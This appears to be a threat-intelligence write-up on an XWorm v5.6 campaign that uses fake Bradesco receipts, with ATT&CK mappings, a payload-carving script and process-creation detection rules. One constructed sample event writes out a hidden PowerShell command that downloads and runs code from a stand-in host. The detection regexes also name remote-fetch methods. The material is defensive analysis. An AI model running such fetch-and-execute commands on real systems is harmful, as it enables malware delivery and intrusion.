EXECUTIVE SUMMARY
The campaign involves a multi-stage infection chain distributing XWorm v5.6 through banking-themed lures targeting businesses across Brazil and Latin America. The attack begins with a fake receipt referencing Banco Bradesco that uses a deceptive double extension to appear as a harmless document while executing as a Windows Script Host dropper. The file is intentionally padded with junk data to increase its size and bypass scanning engines that skip large files. Its JavaScript content is further hidden using Unicode junk injection that mixes emojis, homoglyphs, and non-ASCII characters to conceal malicious logic. During execution, a reconstruction routine removes this noise and rebuilds a concealed PowerShell command responsible for downloading the next stage. Instead of launching PowerShell through obvious execution methods, the script uses WMI to spawn it silently with hidden window attributes and a short delay designed to evade automated sandbox detection.
The second phase relies on trusted service abuse and steganography to maintain stealth. The decoded PowerShell command retrieves an image from Cloudinary so that network traffic resembles normal image downloads. The image secretly contains a Base64-encoded .NET assembly hidden between custom markers, which the script extracts and loads directly into memory using reflection. Because the payload never touches disk, traditional detection opportunities are reduced. The in-memory loader decodes an obfuscated argument revealing the final payload location and deploys a VB.NET component that establishes persistence. Rather than using visible command-line task creation, the component communicates directly with Task Scheduler COM interfaces, producing persistence entries without typical execution traces. The scheduled task re-launches the loader during logon, creating a reinfection loop that preserves modular control.
The final stage delivers the remote access trojan disguised as a text file containing a reversed Base64-encoded executable that is decoded and injected into a legitimate system binary. This living-off-the-land technique enables command and control communication while blending with trusted processes. The payload configuration is protected only by weak encryption, so analysis can recover infrastructure details such as command-and-control endpoints, communication parameters, installation paths, and execution identifiers. Once active, the trojan supports credential theft, session hijacking, keystroke logging, and lateral movement into email and financial environments, enabling broader compromise from a single user interaction. The persistence mechanism that repeatedly launches the loader, combined with trusted process injection, delays visibility of malicious activity, because early indicators resemble routine background behavior such as image downloads and hidden scripting. This delay extends response time and allows operators to expand access while preparing additional impact stages, including payment fraud and ransomware deployment.
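Both payload hand-offs described in the two paragraphs above (the Base64 .NET assembly carved from between markers in the downloaded image, and the reversed-Base64 executable delivered as a text file) reduce to the same analyst task: cut the bytes out, decode them, and confirm what they are before going further. The Python below is an added example for this page, not code from the report or from the malware. The report does not name the real markers, so START_MARKER and END_MARKER are assumptions; the fake image, the fake text file and the stand-in PE header are constructed fixtures (the stand-in has no sections or code and cannot be loaded).

```python
"""Carve the staged payloads and identify what came out.

Added example (not the report's or the malware's code). Markers, the fake
image bytes, the fake text file and the stand-in PE are all CONSTRUCTED.
"""
from __future__ import annotations

import base64
import binascii
import struct

START_MARKER = b"<<BASE64_START>>"   # assumed; the report does not name the real marker
END_MARKER = b"<<BASE64_END>>"       # assumed; the report does not name the real marker


def classify_pe(data: bytes) -> dict:
    """Return {'is_pe', 'is_dotnet', 'magic'}. A .NET assembly is recognised by a
    non-empty CLR runtime header: data directory 14 (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)."""
    info = {"is_pe": False, "is_dotnet": False, "magic": None}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return info
    info["is_pe"] = True
    opt = e_lfanew + 24                          # optional header follows the 20-byte COFF header
    if opt + 2 > len(data):
        return info
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                           # PE32: NumberOfRvaAndSizes at +92, directories at +96
        info["magic"], count_off, dirs_off = "PE32", opt + 92, opt + 96
    elif magic == 0x20B:                         # PE32+: +108 / +112 (8-byte ImageBase and stack/heap fields)
        info["magic"], count_off, dirs_off = "PE32+", opt + 108, opt + 112
    else:
        return info
    clr_off = dirs_off + 14 * 8
    if count_off + 4 <= len(data) and clr_off + 8 <= len(data):
        count = struct.unpack_from("<I", data, count_off)[0]
        rva, size = struct.unpack_from("<II", data, clr_off)
        info["is_dotnet"] = count > 14 and rva != 0 and size != 0
    return info


def carve_between_markers(blob: bytes, start: bytes, end: bytes) -> bytes | None:
    """Base64-decode whatever sits between two markers. Line wrapping inside the
    image is tolerated; any other non-Base64 byte makes the decode fail closed."""
    i = blob.find(start)
    if i < 0:
        return None
    j = blob.find(end, i + len(start))
    if j < 0:
        return None
    try:
        return base64.b64decode(b"".join(blob[i + len(start):j].split()), validate=True)
    except (binascii.Error, ValueError):
        return None


def decode_reversed_base64(text: str) -> tuple[str, bytes] | None:
    """'Reversed Base64' can mean reverse-then-decode or decode-then-reverse;
    try both and accept the reading that yields a PE image."""
    compact = "".join(text.split())
    attempts = (
        ("reverse-then-decode", lambda s: base64.b64decode(s[::-1], validate=True)),
        ("decode-then-reverse", lambda s: base64.b64decode(s, validate=True)[::-1]),
    )
    for name, fn in attempts:
        try:
            data = fn(compact)
        except (binascii.Error, ValueError):
            continue
        if classify_pe(data)["is_pe"]:
            return name, data
    return None


def build_fake_dotnet_pe() -> bytes:
    """CONSTRUCTED stand-in for the extracted assembly: DOS/PE/optional headers only,
    CLR directory populated, no sections and no code, so it is not loadable."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)   # i386, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                             # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)         # CLR header RVA and size
    return dos + b"PE\x00\x00" + coff + bytes(opt)


def build_fake_image(payload: bytes) -> bytes:
    """CONSTRUCTED 'image': JPEG SOI/EOI bytes around filler, markers and wrapped Base64."""
    b64 = base64.b64encode(payload)
    wrapped = b"\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
    return b"\xff\xd8\xff\xe0" + b"\x00" * 64 + START_MARKER + wrapped + END_MARKER + b"\xff\xd9"


def build_reversed_text(payload: bytes) -> str:
    """CONSTRUCTED 'text file': Base64 of the payload written backwards, line-wrapped."""
    rev = base64.b64encode(payload).decode()[::-1]
    return "\n".join(rev[i:i + 64] for i in range(0, len(rev), 64))


if __name__ == "__main__":
    pe = build_fake_dotnet_pe()
    carved = carve_between_markers(build_fake_image(pe), START_MARKER, END_MARKER)
    print("stage 2 from image:", classify_pe(carved) if carved else "not found")
    result = decode_reversed_base64(build_reversed_text(pe))
    print("stage 3 from text :", result[0] if result else "no PE in either reading")
```

The `is_dotnet` check matters because the carved bytes are exactly what the loader hands to reflective assembly loading: a populated CLR directory confirms the stage is managed code, while a PE without one points at a native payload and a different next step in the analysis.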
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| --- | --- | --- | --- |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| Execution | T1047 | Windows Management Instrumentation | — |
| Persistence | T1053.005 | Scheduled Task/Job | Scheduled Task |
| Defense Evasion | T1027.010 | Obfuscated Files or Information | Command Obfuscation |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | — |
| Defense Evasion | T1218.010 | System Binary Proxy Execution | Regsvcs/Regasm |
| Defense Evasion | T1620 | Reflective Code Loading | — |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Collection | T1056.001 | Input Capture | Keylogging |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
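The T1059.007, T1047 and T1218.010 rows above each leave a process-creation footprint, and the summary names the shapes to look for: a Windows Script Host running a double-extension "document", PowerShell spawned by the WMI provider host with a hidden window and a remote fetch, and a .NET utility started by the scripting chain. The Python below is an added example for this page, not a detection shipped by any vendor named here. The events are constructed in Sysmon Event ID 1 style (Image, ParentImage, CommandLine); file names, user, URL and the choice of RegAsm as the proxied binary's parent relationship are assumptions for the demo.

```python
"""Process-creation rules for the execution chain mapped above.

Added example for this page, not a vendor detection. SAMPLE_EVENTS are
CONSTRUCTED in Sysmon Event ID 1 style; names and paths are invented.
"""
from __future__ import annotations

import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOTNET_UTILS = {"regasm.exe", "regsvcs.exe"}
# document-looking inner extension followed by a WSH/HTA script extension
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(js|jse|vbs|vbe|wsf|wsh|hta)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+h[a-z]*", re.I)           # -w h ... -WindowStyle Hidden
REMOTE_FETCH = re.compile(r"https?://|Download(?:String|File|Data)|Invoke-(?:WebRequest|RestMethod)", re.I)

SAMPLE_EVENTS = [  # constructed; only the fields the rules read are included
    {"RecordId": "evt-1", "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\ana\Downloads\Comprovante_Bradesco.pdf.js"'},
    {"RecordId": "evt-2", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/receipt.jpg')\""},
    {"RecordId": "evt-3", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users\ana\Documents"},
    {"RecordId": "evt-4", "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"RecordId": "evt-5", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    image = ntpath.basename(event["Image"]).lower()       # ntpath: Windows paths on any analysis host
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmd = event.get("CommandLine", "")
    hits = []
    if image in SCRIPT_HOSTS and DOUBLE_EXT.search(cmd):
        hits.append("wsh_double_extension")               # T1566.001 lure -> T1059.007 dropper
    if image in POWERSHELL and parent == "wmiprvse.exe":
        hits.append("powershell_from_wmi")                # T1047 used to launch the stager
    if image in POWERSHELL and HIDDEN_WINDOW.search(cmd) and REMOTE_FETCH.search(cmd):
        hits.append("hidden_powershell_download")         # T1105 stage retrieval, window hidden
    if image in DOTNET_UTILS and parent in (POWERSHELL | SCRIPT_HOSTS):
        hits.append("regasm_from_script_host")            # T1218.010 host started by the script chain
    return hits


def detect(events: list[dict]) -> dict[str, list[str]]:
    """Map RecordId -> matched rules for every event that matched at least one."""
    return {e["RecordId"]: h for e in events if (h := evaluate(e))}


if __name__ == "__main__":
    for record_id, rules in detect(SAMPLE_EVENTS).items():
        print(record_id, "->", ", ".join(rules))
```

The parent-process rule is the one worth tuning first: WmiPrvSE.exe does legitimately spawn PowerShell in environments that run SCCM or other WMI-driven management, so pair it with the hidden-window and remote-fetch conditions (as evt-2 does) before paging anyone, and treat the double-extension rule as high confidence on its own.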
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| --- | --- | --- |
| Defense Evasion | E1027 | Obfuscated Files or Information |
| Defense Evasion | E1055 | Process Injection |
| Defense Evasion | B0036 | Capture Evasion |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Command and Control | B0030 | C2 Communication |
| Collection | E1560 | Archive Collected Data |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/xworm-malware-fake-financial-receipts/